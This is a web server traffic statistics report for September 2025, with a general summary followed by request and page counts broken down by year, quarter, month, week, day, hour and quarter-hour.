Program started at Wed-01-Oct-2025 02:21.
Analysed requests from Mon-01-Sep-2025 02:27 to Wed-01-Oct-2025 02:21 (30.00 days).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report contains overall statistics.
Figures in parentheses refer to the 7-day period ending 01-Oct-2025 02:21.
Successful requests: 559,505 (150,772)
Average successful requests per day: 18,652 (21,538)
Successful requests for pages: 331,007 (78,898)
Average successful requests for pages per day: 11,035 (11,271)
Failed requests: 236,252 (30,381)
Redirected requests: 155,343 (63,182)
Distinct files requested: 166,397 (50,359)
Distinct hosts served: 21,746 (6,484)
Data transferred: 29.24 gigabytes (9.27 gigabytes)
Average data transferred per day: 998.08 megabytes (1.32 gigabytes)
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each year.
Each unit () represents 8,000 requests for pages or part thereof.
year | reqs | pages | |
---|---|---|---|
2025 | 559505 | 331007 | ![]() ![]() ![]() |
Busiest year: 2025 (331,007 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each quarter.
Each unit () represents 10,000 requests for pages or part thereof.
quarter | reqs | pages | |
---|---|---|---|
Jul–Sep 2025 | 557409 | 329823 | ![]() ![]() |
Oct–Dec 2025 | 2096 | 1184 | ![]() |
Busiest quarter: Jul–Sep 2025 (329,823 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each month.
Each unit () represents 10,000 requests for pages or part thereof.
month | reqs | pages | |
---|---|---|---|
Sep 2025 | 557409 | 329823 | ![]() ![]() |
Oct 2025 | 2096 | 1184 | ![]() |
Busiest month: Sep 2025 (329,823 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each week.
Each unit () represents 3,000 requests for pages or part thereof.
week beg. | reqs | pages | |
---|---|---|---|
31/Aug/25 | 73342 | 41899 | ![]() ![]() ![]() |
7/Sep/25 | 109597 | 69062 | ![]() ![]() |
14/Sep/25 | 162954 | 103894 | ![]() ![]() ![]() |
21/Sep/25 | 144534 | 79970 | ![]() ![]() ![]() ![]() |
28/Sep/25 | 69078 | 36182 | ![]() ![]() ![]() |
Busiest week: week beginning 14/Sep/25 (103,894 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each day.
Each unit () represents 800 requests for pages or part thereof.
date | reqs | pages | |
---|---|---|---|
1/Sep/25 | 9657 | 6228 | ![]() |
2/Sep/25 | 12396 | 7107 | ![]() ![]() |
3/Sep/25 | 16294 | 7692 | ![]() ![]() |
4/Sep/25 | 12808 | 7775 | ![]() ![]() |
5/Sep/25 | 11592 | 6809 | ![]() ![]() |
6/Sep/25 | 10595 | 6288 | ![]() |
7/Sep/25 | 11104 | 6831 | ![]() ![]() |
8/Sep/25 | 25206 | 10729 | ![]() ![]() ![]() |
9/Sep/25 | 28377 | 20012 | ![]() ![]() ![]() |
10/Sep/25 | 12190 | 8095 | ![]() ![]() ![]() |
11/Sep/25 | 10917 | 7812 | ![]() ![]() |
12/Sep/25 | 10283 | 7469 | ![]() ![]() |
13/Sep/25 | 11520 | 8114 | ![]() ![]() ![]() |
14/Sep/25 | 15655 | 11501 | ![]() ![]() ![]() ![]() |
15/Sep/25 | 12654 | 8211 | ![]() ![]() ![]() |
16/Sep/25 | 17669 | 10588 | ![]() ![]() ![]() |
17/Sep/25 | 42974 | 29046 | ![]() ![]() ![]() |
18/Sep/25 | 22672 | 14958 | ![]() ![]() ![]() |
19/Sep/25 | 24280 | 14224 | ![]() ![]() |
20/Sep/25 | 27050 | 15366 | ![]() ![]() |
21/Sep/25 | 19708 | 11874 | ![]() ![]() ![]() ![]() |
22/Sep/25 | 20252 | 12058 | ![]() |
23/Sep/25 | 19924 | 11820 | ![]() ![]() ![]() ![]() |
24/Sep/25 | 22408 | 12360 | ![]() |
25/Sep/25 | 20110 | 11776 | ![]() ![]() ![]() ![]() |
26/Sep/25 | 20132 | 10794 | ![]() ![]() ![]() |
27/Sep/25 | 22000 | 9288 | ![]() ![]() |
28/Sep/25 | 19754 | 10442 | ![]() ![]() ![]() |
29/Sep/25 | 20690 | 11062 | ![]() ![]() ![]() |
30/Sep/25 | 26538 | 13494 | ![]() ![]() |
1/Oct/25 | 2096 | 1184 | ![]() |
Busiest day: 17/Sep/25 (29,046 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the total activity for each day of the week, summed over all the weeks in the report.
Each unit () represents 1,500 requests for pages or part thereof.
day | reqs | pages | |
---|---|---|---|
Sun | 66221 | 40648 | ![]() ![]() ![]() |
Mon | 88459 | 48288 | ![]() ![]() |
Tue | 104904 | 63021 | ![]() ![]() ![]() ![]() |
Wed | 95962 | 58377 | ![]() ![]() ![]() ![]() |
Thu | 66507 | 42321 | ![]() ![]() ![]() ![]() |
Fri | 66287 | 39296 | ![]() ![]() ![]() ![]() |
Sat | 71165 | 39056 | ![]() ![]() ![]() ![]() |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each hour.
Each unit () represents 40 requests for pages or part thereof.
time | reqs | pages | |
---|---|---|---|
28/Sep/25 03:00–04:00 | 842 | 408 | ![]() ![]() ![]() |
28/Sep/25 04:00–05:00 | 934 | 428 | ![]() ![]() ![]() |
28/Sep/25 05:00–06:00 | 802 | 414 | ![]() ![]() ![]() |
28/Sep/25 06:00–07:00 | 770 | 376 | ![]() ![]() |
28/Sep/25 07:00–08:00 | 834 | 472 | ![]() ![]() |
28/Sep/25 08:00–09:00 | 812 | 438 | ![]() ![]() ![]() |
28/Sep/25 09:00–10:00 | 788 | 426 | ![]() ![]() ![]() |
28/Sep/25 10:00–11:00 | 958 | 456 | ![]() ![]() |
28/Sep/25 11:00–12:00 | 798 | 496 | ![]() ![]() ![]() |
28/Sep/25 12:00–13:00 | 904 | 416 | ![]() ![]() ![]() |
28/Sep/25 13:00–14:00 | 742 | 406 | ![]() ![]() ![]() |
28/Sep/25 14:00–15:00 | 810 | 418 | ![]() ![]() ![]() |
28/Sep/25 15:00–16:00 | 770 | 426 | ![]() ![]() ![]() |
28/Sep/25 16:00–17:00 | 746 | 428 | ![]() ![]() ![]() |
28/Sep/25 17:00–18:00 | 758 | 424 | ![]() ![]() ![]() |
28/Sep/25 18:00–19:00 | 758 | 434 | ![]() ![]() ![]() |
28/Sep/25 19:00–20:00 | 828 | 460 | ![]() ![]() |
28/Sep/25 20:00–21:00 | 790 | 440 | ![]() ![]() ![]() |
28/Sep/25 21:00–22:00 | 786 | 440 | ![]() ![]() ![]() |
28/Sep/25 22:00–23:00 | 828 | 474 | ![]() ![]() |
28/Sep/25 23:00–24:00 | 866 | 500 | ![]() ![]() ![]() |
29/Sep/25 00:00–01:00 | 886 | 516 | ![]() ![]() ![]() |
29/Sep/25 01:00–02:00 | 828 | 474 | ![]() ![]() |
29/Sep/25 02:00–03:00 | 756 | 452 | ![]() ![]() |
29/Sep/25 03:00–04:00 | 756 | 460 | ![]() ![]() |
29/Sep/25 04:00–05:00 | 818 | 460 | ![]() ![]() |
29/Sep/25 05:00–06:00 | 832 | 504 | ![]() ![]() ![]() |
29/Sep/25 06:00–07:00 | 836 | 478 | ![]() ![]() |
29/Sep/25 07:00–08:00 | 798 | 466 | ![]() ![]() |
29/Sep/25 08:00–09:00 | 938 | 464 | ![]() ![]() |
29/Sep/25 09:00–10:00 | 750 | 460 | ![]() ![]() |
29/Sep/25 10:00–11:00 | 984 | 528 | ![]() ![]() ![]() |
29/Sep/25 11:00–12:00 | 854 | 528 | ![]() ![]() ![]() |
29/Sep/25 12:00–13:00 | 1140 | 528 | ![]() ![]() ![]() |
29/Sep/25 13:00–14:00 | 866 | 538 | ![]() ![]() ![]() |
29/Sep/25 14:00–15:00 | 810 | 414 | ![]() ![]() ![]() |
29/Sep/25 15:00–16:00 | 488 | 124 | ![]() |
29/Sep/25 16:00–17:00 | 586 | 292 | ![]() |
29/Sep/25 17:00–18:00 | 886 | 450 | ![]() ![]() |
29/Sep/25 18:00–19:00 | 994 | 510 | ![]() ![]() ![]() |
29/Sep/25 19:00–20:00 | 878 | 474 | ![]() ![]() |
29/Sep/25 20:00–21:00 | 892 | 442 | ![]() ![]() |
29/Sep/25 21:00–22:00 | 950 | 502 | ![]() ![]() ![]() |
29/Sep/25 22:00–23:00 | 1014 | 480 | ![]() ![]() |
29/Sep/25 23:00–24:00 | 1150 | 518 | ![]() ![]() ![]() |
30/Sep/25 00:00–01:00 | 932 | 498 | ![]() ![]() ![]() |
30/Sep/25 01:00–02:00 | 902 | 486 | ![]() ![]() ![]() |
30/Sep/25 02:00–03:00 | 1122 | 554 | ![]() ![]() ![]() |
30/Sep/25 03:00–04:00 | 902 | 458 | ![]() ![]() |
30/Sep/25 04:00–05:00 | 870 | 456 | ![]() ![]() |
30/Sep/25 05:00–06:00 | 914 | 500 | ![]() ![]() ![]() |
30/Sep/25 06:00–07:00 | 924 | 556 | ![]() ![]() ![]() |
30/Sep/25 07:00–08:00 | 1066 | 582 | ![]() ![]() ![]() ![]() |
30/Sep/25 08:00–09:00 | 1416 | 496 | ![]() ![]() ![]() |
30/Sep/25 09:00–10:00 | 1038 | 494 | ![]() ![]() ![]() |
30/Sep/25 10:00–11:00 | 924 | 442 | ![]() ![]() |
30/Sep/25 11:00–12:00 | 1220 | 606 | ![]() |
30/Sep/25 12:00–13:00 | 1044 | 582 | ![]() ![]() ![]() ![]() |
30/Sep/25 13:00–14:00 | 1118 | 604 | ![]() |
30/Sep/25 14:00–15:00 | 1104 | 550 | ![]() ![]() ![]() |
30/Sep/25 15:00–16:00 | 1122 | 522 | ![]() ![]() ![]() |
30/Sep/25 16:00–17:00 | 1400 | 560 | ![]() ![]() ![]() |
30/Sep/25 17:00–18:00 | 1252 | 704 | ![]() ![]() |
30/Sep/25 18:00–19:00 | 1204 | 560 | ![]() ![]() ![]() |
30/Sep/25 19:00–20:00 | 926 | 528 | ![]() ![]() ![]() |
30/Sep/25 20:00–21:00 | 1312 | 636 | ![]() |
30/Sep/25 21:00–22:00 | 1252 | 620 | ![]() |
30/Sep/25 22:00–23:00 | 1350 | 628 | ![]() |
30/Sep/25 23:00–24:00 | 1224 | 872 | ![]() ![]() ![]() |
1/Oct/25 00:00–01:00 | 924 | 574 | ![]() ![]() ![]() ![]() |
1/Oct/25 01:00–02:00 | 822 | 454 | ![]() ![]() |
1/Oct/25 02:00–03:00 | 350 | 156 | ![]() |
Busiest hour: 17/Sep/25 06:00–07:00 (4,962 requests for pages).
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the total activity for each hour of the week, summed over all the weeks in the report.
Each unit () represents 200 requests for pages or part thereof.
hour | reqs | pages | |
---|---|---|---|
Sun 00:00–01:00 | 2552 | 1508 | ![]() |
Sun 01:00–02:00 | 2468 | 1503 | ![]() |
Sun 02:00–03:00 | 2645 | 1546 | ![]() |
Sun 03:00–04:00 | 2766 | 1483 | ![]() |
Sun 04:00–05:00 | 2630 | 1568 | ![]() |
Sun 05:00–06:00 | 2444 | 1492 | ![]() |
Sun 06:00–07:00 | 2390 | 1398 | ![]() ![]() ![]() |
Sun 07:00–08:00 | 2572 | 1562 | ![]() |
Sun 08:00–09:00 | 2453 | 1553 | ![]() |
Sun 09:00–10:00 | 2473 | 1522 | ![]() |
Sun 10:00–11:00 | 2670 | 1512 | ![]() |
Sun 11:00–12:00 | 2450 | 1589 | ![]() |
Sun 12:00–13:00 | 2668 | 1532 | ![]() |
Sun 13:00–14:00 | 2454 | 1427 | ![]() |
Sun 14:00–15:00 | 2666 | 1552 | ![]() |
Sun 15:00–16:00 | 6005 | 4391 | ![]() ![]() ![]() |
Sun 16:00–17:00 | 2584 | 1585 | ![]() |
Sun 17:00–18:00 | 4502 | 3065 | ![]() |
Sun 18:00–19:00 | 2349 | 1427 | ![]() |
Sun 19:00–20:00 | 2452 | 1473 | ![]() |
Sun 20:00–21:00 | 2473 | 1446 | ![]() |
Sun 21:00–22:00 | 2571 | 1482 | ![]() |
Sun 22:00–23:00 | 2505 | 1553 | ![]() |
Sun 23:00–24:00 | 2479 | 1479 | ![]() |
Mon 00:00–01:00 | 3294 | 1789 | ![]() ![]() |
Mon 01:00–02:00 | 3596 | 1808 | ![]() ![]() |
Mon 02:00–03:00 | 3330 | 1827 | ![]() ![]() |
Mon 03:00–04:00 | 3625 | 1832 | ![]() ![]() |
Mon 04:00–05:00 | 3715 | 1907 | ![]() ![]() |
Mon 05:00–06:00 | 3216 | 1920 | ![]() ![]() |
Mon 06:00–07:00 | 3872 | 2342 | ![]() ![]() |
Mon 07:00–08:00 | 3985 | 2329 | ![]() ![]() |
Mon 08:00–09:00 | 3575 | 2007 | ![]() ![]() ![]() |
Mon 09:00–10:00 | 3564 | 1947 | ![]() ![]() |
Mon 10:00–11:00 | 3588 | 2073 | ![]() ![]() ![]() |
Mon 11:00–12:00 | 3905 | 2127 | ![]() ![]() ![]() |
Mon 12:00–13:00 | 4086 | 1967 | ![]() ![]() |
Mon 13:00–14:00 | 3442 | 1939 | ![]() ![]() |
Mon 14:00–15:00 | 3566 | 1869 | ![]() ![]() |
Mon 15:00–16:00 | 4804 | 2675 | ![]() ![]() ![]() |
Mon 16:00–17:00 | 2927 | 1664 | ![]() ![]() |
Mon 17:00–18:00 | 3669 | 1961 | ![]() ![]() |
Mon 18:00–19:00 | 3566 | 1939 | ![]() ![]() |
Mon 19:00–20:00 | 3670 | 2133 | ![]() ![]() ![]() |
Mon 20:00–21:00 | 3533 | 1880 | ![]() ![]() |
Mon 21:00–22:00 | 3711 | 2047 | ![]() ![]() ![]() |
Mon 22:00–23:00 | 4226 | 2120 | ![]() ![]() ![]() |
Mon 23:00–24:00 | 3994 | 2186 | ![]() ![]() ![]() |
Tue 00:00–01:00 | 3665 | 2080 | ![]() ![]() ![]() |
Tue 01:00–02:00 | 3285 | 1987 | ![]() ![]() |
Tue 02:00–03:00 | 4623 | 2725 | ![]() ![]() ![]() |
Tue 03:00–04:00 | 5502 | 3598 | ![]() ![]() |
Tue 04:00–05:00 | 5544 | 3519 | ![]() ![]() |
Tue 05:00–06:00 | 6339 | 4138 | ![]() ![]() ![]() |
Tue 06:00–07:00 | 3947 | 2581 | ![]() ![]() ![]() |
Tue 07:00–08:00 | 3194 | 1958 | ![]() ![]() |
Tue 08:00–09:00 | 4326 | 2364 | ![]() ![]() |
Tue 09:00–10:00 | 6050 | 4223 | ![]() ![]() ![]() |
Tue 10:00–11:00 | 5955 | 4117 | ![]() ![]() ![]() |
Tue 11:00–12:00 | 4185 | 2526 | ![]() ![]() ![]() |
Tue 12:00–13:00 | 3052 | 1809 | ![]() ![]() |
Tue 13:00–14:00 | 3168 | 1982 | ![]() ![]() |
Tue 14:00–15:00 | 3509 | 2060 | ![]() ![]() ![]() |
Tue 15:00–16:00 | 3890 | 2040 | ![]() ![]() ![]() |
Tue 16:00–17:00 | 3691 | 2008 | ![]() ![]() ![]() |
Tue 17:00–18:00 | 3549 | 2206 | ![]() ![]() |
Tue 18:00–19:00 | 3955 | 2254 | ![]() ![]() |
Tue 19:00–20:00 | 4575 | 2292 | ![]() ![]() |
Tue 20:00–21:00 | 5872 | 3089 | ![]() |
Tue 21:00–22:00 | 3272 | 1821 | ![]() ![]() |
Tue 22:00–23:00 | 4171 | 2428 | ![]() ![]() ![]() |
Tue 23:00–24:00 | 5585 | 3216 | ![]() ![]() |
Wed 00:00–01:00 | 5414 | 2981 | ![]() ![]() ![]() ![]() |
Wed 01:00–02:00 | 5547 | 2493 | ![]() ![]() ![]() |
Wed 02:00–03:00 | 4253 | 2188 | ![]() ![]() ![]() |
Wed 03:00–04:00 | 4019 | 2466 | ![]() ![]() ![]() |
Wed 04:00–05:00 | 6963 | 4867 | ![]() ![]() ![]() |
Wed 05:00–06:00 | 7872 | 5688 | ![]() ![]() ![]() ![]() |
Wed 06:00–07:00 | 8404 | 6094 | ![]() ![]() ![]() ![]() ![]() |
Wed 07:00–08:00 | 7848 | 5370 | ![]() ![]() ![]() ![]() |
Wed 08:00–09:00 | 3008 | 1704 | ![]() ![]() |
Wed 09:00–10:00 | 3688 | 1756 | ![]() ![]() |
Wed 10:00–11:00 | 2685 | 1560 | ![]() |
Wed 11:00–12:00 | 2811 | 1620 | ![]() ![]() |
Wed 12:00–13:00 | 3238 | 1811 | ![]() ![]() |
Wed 13:00–14:00 | 2763 | 1689 | ![]() ![]() |
Wed 14:00–15:00 | 2767 | 1629 | ![]() ![]() |
Wed 15:00–16:00 | 2898 | 1676 | ![]() ![]() |
Wed 16:00–17:00 | 3216 | 1807 | ![]() ![]() |
Wed 17:00–18:00 | 3168 | 1657 | ![]() ![]() |
Wed 18:00–19:00 | 2687 | 1714 | ![]() ![]() |
Wed 19:00–20:00 | 2608 | 1647 | ![]() ![]() |
Wed 20:00–21:00 | 2689 | 1628 | ![]() ![]() |
Wed 21:00–22:00 | 2438 | 1570 | ![]() |
Wed 22:00–23:00 | 2374 | 1309 | ![]() ![]() ![]() |
Wed 23:00–24:00 | 2604 | 1453 | ![]() |
Thu 00:00–01:00 | 3060 | 1898 | ![]() ![]() |
Thu 01:00–02:00 | 3188 | 2027 | ![]() ![]() ![]() |
Thu 02:00–03:00 | 2883 | 1933 | ![]() ![]() |
Thu 03:00–04:00 | 2687 | 1706 | ![]() ![]() |
Thu 04:00–05:00 | 2468 | 1698 | ![]() ![]() |
Thu 05:00–06:00 | 2482 | 1631 | ![]() ![]() |
Thu 06:00–07:00 | 2648 | 1702 | ![]() ![]() |
Thu 07:00–08:00 | 2560 | 1673 | ![]() ![]() |
Thu 08:00–09:00 | 2980 | 2037 | ![]() ![]() ![]() |
Thu 09:00–10:00 | 2681 | 1697 | ![]() ![]() |
Thu 10:00–11:00 | 2746 | 1728 | ![]() ![]() |
Thu 11:00–12:00 | 2885 | 1687 | ![]() ![]() |
Thu 12:00–13:00 | 2755 | 1870 | ![]() ![]() |
Thu 13:00–14:00 | 3019 | 1725 | ![]() ![]() |
Thu 14:00–15:00 | 3365 | 2042 | ![]() ![]() ![]() |
Thu 15:00–16:00 | 2638 | 1682 | ![]() ![]() |
Thu 16:00–17:00 | 3013 | 1942 | ![]() ![]() |
Thu 17:00–18:00 | 2438 | 1591 | ![]() |
Thu 18:00–19:00 | 2677 | 1739 | ![]() ![]() |
Thu 19:00–20:00 | 2572 | 1595 | ![]() |
Thu 20:00–21:00 | 2596 | 1678 | ![]() ![]() |
Thu 21:00–22:00 | 2779 | 1686 | ![]() ![]() |
Thu 22:00–23:00 | 2723 | 1671 | ![]() ![]() |
Thu 23:00–24:00 | 2664 | 1683 | ![]() ![]() |
Fri 00:00–01:00 | 2822 | 1680 | ![]() ![]() |
Fri 01:00–02:00 | 2595 | 1570 | ![]() |
Fri 02:00–03:00 | 2326 | 1408 | ![]() |
Fri 03:00–04:00 | 2668 | 1643 | ![]() ![]() |
Fri 04:00–05:00 | 3060 | 1787 | ![]() ![]() |
Fri 05:00–06:00 | 2835 | 1712 | ![]() ![]() |
Fri 06:00–07:00 | 2822 | 1738 | ![]() ![]() |
Fri 07:00–08:00 | 2788 | 1680 | ![]() ![]() |
Fri 08:00–09:00 | 2990 | 1942 | ![]() ![]() |
Fri 09:00–10:00 | 2732 | 1640 | ![]() ![]() |
Fri 10:00–11:00 | 2652 | 1658 | ![]() ![]() |
Fri 11:00–12:00 | 2726 | 1676 | ![]() ![]() |
Fri 12:00–13:00 | 2645 | 1653 | ![]() ![]() |
Fri 13:00–14:00 | 2638 | 1640 | ![]() ![]() |
Fri 14:00–15:00 | 2835 | 1666 | ![]() ![]() |
Fri 15:00–16:00 | 2717 | 1670 | ![]() ![]() |
Fri 16:00–17:00 | 3104 | 1671 | ![]() ![]() |
Fri 17:00–18:00 | 2092 | 1248 | ![]() ![]() ![]() |
Fri 18:00–19:00 | 1842 | 1173 | ![]() ![]() |
Fri 19:00–20:00 | 2641 | 1577 | ![]() |
Fri 20:00–21:00 | 2734 | 1434 | ![]() |
Fri 21:00–22:00 | 2710 | 1341 | ![]() ![]() ![]() |
Fri 22:00–23:00 | 4196 | 2394 | ![]() ![]() |
Fri 23:00–24:00 | 3117 | 1695 | ![]() ![]() |
Sat 00:00–01:00 | 2917 | 1525 | ![]() |
Sat 01:00–02:00 | 3048 | 1710 | ![]() ![]() |
Sat 02:00–03:00 | 3568 | 1505 | ![]() |
Sat 03:00–04:00 | 3091 | 1540 | ![]() |
Sat 04:00–05:00 | 2572 | 1442 | ![]() |
Sat 05:00–06:00 | 2425 | 1264 | ![]() ![]() ![]() |
Sat 06:00–07:00 | 2933 | 1410 | ![]() |
Sat 07:00–08:00 | 2787 | 1805 | ![]() ![]() |
Sat 08:00–09:00 | 2883 | 1706 | ![]() ![]() |
Sat 09:00–10:00 | 3847 | 2607 | ![]() ![]() ![]() |
Sat 10:00–11:00 | 3345 | 1997 | ![]() ![]() |
Sat 11:00–12:00 | 3551 | 1599 | ![]() |
Sat 12:00–13:00 | 3564 | 1809 | ![]() ![]() |
Sat 13:00–14:00 | 3020 | 1629 | ![]() ![]() |
Sat 14:00–15:00 | 3143 | 1632 | ![]() ![]() |
Sat 15:00–16:00 | 2776 | 1618 | ![]() ![]() |
Sat 16:00–17:00 | 2989 | 1680 | ![]() ![]() |
Sat 17:00–18:00 | 3392 | 2038 | ![]() ![]() ![]() |
Sat 18:00–19:00 | 3050 | 1584 | ![]() |
Sat 19:00–20:00 | 2607 | 1506 | ![]() |
Sat 20:00–21:00 | 2409 | 1267 | ![]() ![]() ![]() |
Sat 21:00–22:00 | 2219 | 1098 | ![]() ![]() |
Sat 22:00–23:00 | 2408 | 1452 | ![]() |
Sat 23:00–24:00 | 2621 | 1633 | ![]() ![]() |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the total activity for each hour of the day, summed over all the days in the report.
Each unit () represents 400 requests for pages or part thereof.
hour | reqs | pages | |
---|---|---|---|
0 | 23724 | 13461 | ![]() ![]() |
1 | 23727 | 13098 | ![]() ![]() |
2 | 23628 | 13132 | ![]() ![]() |
3 | 24358 | 14268 | ![]() ![]() |
4 | 26952 | 16788 | ![]() ![]() ![]() |
5 | 27613 | 17845 | ![]() ![]() ![]() ![]() |
6 | 27016 | 17265 | ![]() ![]() ![]() |
7 | 25734 | 16377 | ![]() ![]() ![]() |
8 | 22215 | 13313 | ![]() ![]() |
9 | 25035 | 15392 | ![]() ![]() ![]() ![]() |
10 | 23641 | 14645 | ![]() ![]() ![]() |
11 | 22513 | 12824 | ![]() ![]() |
12 | 22008 | 12451 | ![]() |
13 | 20504 | 12031 | ![]() ![]() ![]() ![]() ![]() |
14 | 21851 | 12450 | ![]() |
15 | 25728 | 15752 | ![]() ![]() |
16 | 21524 | 12357 | ![]() ![]() ![]() ![]() ![]() |
17 | 22810 | 13766 | ![]() ![]() ![]() |
18 | 20126 | 11830 | ![]() ![]() ![]() ![]() |
19 | 21125 | 12223 | ![]() ![]() ![]() ![]() ![]() |
20 | 22306 | 12422 | ![]() |
21 | 19700 | 11045 | ![]() ![]() ![]() |
22 | 22603 | 12927 | ![]() ![]() |
23 | 23064 | 13345 | ![]() ![]() |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the activity in each quarter-hour period.
Each unit () represents 10 requests for pages or part thereof.
time | reqs | pages | |
---|---|---|---|
30/Sep/25 02:30–02:45 | 270 | 144 | ![]() ![]() ![]() ![]() |
30/Sep/25 02:45–03:00 | 268 | 144 | ![]() ![]() ![]() ![]() |
30/Sep/25 03:00–03:15 | 266 | 126 | ![]() ![]() ![]() |
30/Sep/25 03:15–03:30 | 222 | 112 | ![]() ![]() |
30/Sep/25 03:30–03:45 | 200 | 104 | ![]() ![]() ![]() |
30/Sep/25 03:45–04:00 | 214 | 116 | ![]() ![]() |
30/Sep/25 04:00–04:15 | 266 | 136 | ![]() ![]() ![]() |
30/Sep/25 04:15–04:30 | 206 | 112 | ![]() ![]() |
30/Sep/25 04:30–04:45 | 226 | 114 | ![]() ![]() |
30/Sep/25 04:45–05:00 | 172 | 94 | ![]() ![]() |
30/Sep/25 05:00–05:15 | 248 | 134 | ![]() ![]() ![]() |
30/Sep/25 05:15–05:30 | 242 | 156 | ![]() |
30/Sep/25 05:30–05:45 | 202 | 114 | ![]() ![]() |
